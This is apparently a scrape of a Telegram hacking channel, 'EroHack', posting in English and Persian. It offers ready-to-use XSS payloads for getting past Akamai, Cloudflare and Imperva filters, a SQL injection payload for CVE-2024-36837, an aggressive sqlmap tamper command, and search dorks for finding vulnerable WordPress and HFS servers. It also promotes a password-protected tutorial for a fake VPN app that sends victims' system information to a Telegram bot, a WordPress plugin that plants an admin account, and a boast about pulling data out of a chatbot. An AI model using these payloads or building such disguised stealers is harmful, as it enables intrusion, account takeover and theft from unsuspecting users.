Eʀᴏ ··ʜᴀᴄᴋ··
4.83K subscribers
65 photos
27 videos
10 files
104 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
🔥WAF AKAMAI Bypass 
Lead to 30 XSS in large BBP


"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">

#BugBounty #Tips #Waf
🔸🔸🔸🔸🔸🔸🔸🔸🔸🔸
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍1💯1🎃1🗿1👾1
Media is too big
VIEW IN TELEGRAM
آموزشی که قولش رو داده بودم

ارسال اطلاعات سیستم به بات تلگرامی در قالب آپ فیلترشکن💀
ری‌اکشن فراموش نشه👍
Training to send system information in the form of a secret filter breaking application. Don't forget
support and reaction.
Do not forget the reaction👍

🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯3🔥2👾2💯1🎃1
source code.zip
2.9 KB
🔺مربوط به آموزش بالا🔹
password: @erohack0
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥52👍1💯1
😒SQL Injection in WordPress Plugin

Fofa Query :: body="/wp-content/plugins/email-subscribers/" 2-
publicwww : "/wp-content/plugins/email-subscribers/"


#sql #sql_injection
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥21💯1
This media is not supported in the widget
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6👎3🫡1
⭐️CVE-2024-23692 POC - Unauthenticated RCE Flaw in Rejetto HTTP File Server

Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"


🌐Exploit

#Exploit #Cve #Poc

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3💯2🔥1🎃1👾1
🪱CVE-2024-36837 - SQLI Injection

🔪Payload:
0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334


#CVE #SQLI #Payload
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
✈️EroHack
Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5💯1🎃1
🪳SQLmap Tamper Scripts - WAF bypass

sqlmap -u 'site.com/search.cmd?for…' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --no-cast --no-escape --dbs --random-agent


#WAF #Bypass #sqlmap
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🎃3🔥1
🪐نفوذ به سایت وردپرسی با استفاده از پلاگین

توضیحات:
ما با استفاده از یک پلاگین وردپرس تونستیم به پنل پیشخوان وردپرس دسترسی پیدا کنیم و صفحه لاگین رو به بات تلگرام ارسال کنیم و یک یوزر با سطح دسترسی ادمین ایجاد کنیم.
Using the WordPress plugin, we were able to access the WordPress counter panel and send the login page to the Telegram bot and create a user with admin access
level.

🌟
برای آپلود آموزش ری‌اکشن فراموش نشه.
👁
React to embed the tutorial.

🔸🔸🔸🔸🔸🔸🔸🔸🔸🔸
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19🔥3🤣3🫡3👾1
🏔Fuzzing Subdomain with WFUZZ

wfuzz -c -w subdomains -u "FUZZ[.]target" --sc 200,301,301,401 -Z


#bugbountytips #bugbounty

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👾2💯1
Media is too big
VIEW IN TELEGRAM
⚡️آموزش نفوذ به پنل وردپرس با پلاگین

توضیحات:
با استفاده از یک پلاگین ساده تونستیم آدرس صفحه لاگین ادمین رو پیدا کنیم و یک کاربر با سطح دسترسی ادمین ایجاد کنید.


#WordPress #hack #Payload
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
✈️EroHack
Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍1🎃1🫡1👾1
Security-WP.zip
1.4 KB
⚪️مربوط به پست بالا⚪️
pass: @erohack0
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯7👍1💯1
😠SQLI Injection
CVE: 2024-36837

💻Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 


#BugBounty #Tips
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6💯1👾1
😀XSS in Office.com. The + made a difference.

Payload:‍‍‍
`'>+<script>alert()</script>`

#BugBounty #Tips #XSS

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8💯2🎃1
🔥CLOUDFLARE BYPASS (Xss)

🖥PAYLOAD:
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>


#Bypass #Xss #cloudflare
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
🔝EroHack
💜Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍2💯2🫡1
This media is not supported in your browser
VIEW IN TELEGRAM
🤨10🗿2👎1🔥1😐1
Eʀᴏ ··ʜᴀᴄᴋ··
Video message
سلام درود🫡
محتوای ویدئو مسیج بالا اینکه دیروز من تونستم به اطلاعات یک ربات چت ناشناس نفوذ کنم و دیتا رو بیرون بکشم.
میتونید از لینک زیر رایت‌آپ رو بخونید
و استفاده کنید.

hello everyone
The content of the video message above is that yesterday I was able to hack into an anonymous chatbot and mine the data.
You can read and use the article from the link below.

write-up:
https://medium.com/@EroHack/write-up-telegram-anonymous-chat-hack-bot-ad3497f813ed


برای قرار دادن آموزش ری‌اکشن بزنید.🙌🏻
React to insert tutorial.🙌🏻
🔥17😐3🎃3👍1👾1
XSS WAF Bypass:

Imperva
<details/open/id="&quote;"ontoggle=[JS]>


Amazon
<details/open/id="&quote;"ontoggle=[JS]>


Akamai
<details open id="' &quote;'"ontoggle=[JS]>


EroHack
🗯Boost
📣Twitter
👍61🤨1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «سلام درود🫡 محتوای ویدئو مسیج بالا اینکه دیروز من تونستم به اطلاعات یک ربات چت ناشناس نفوذ کنم و دیتا رو بیرون بکشم. میتونید از لینک زیر رایت‌آپ رو بخونید و استفاده کنید. hello everyone The content of the video message above is that yesterday I was able…»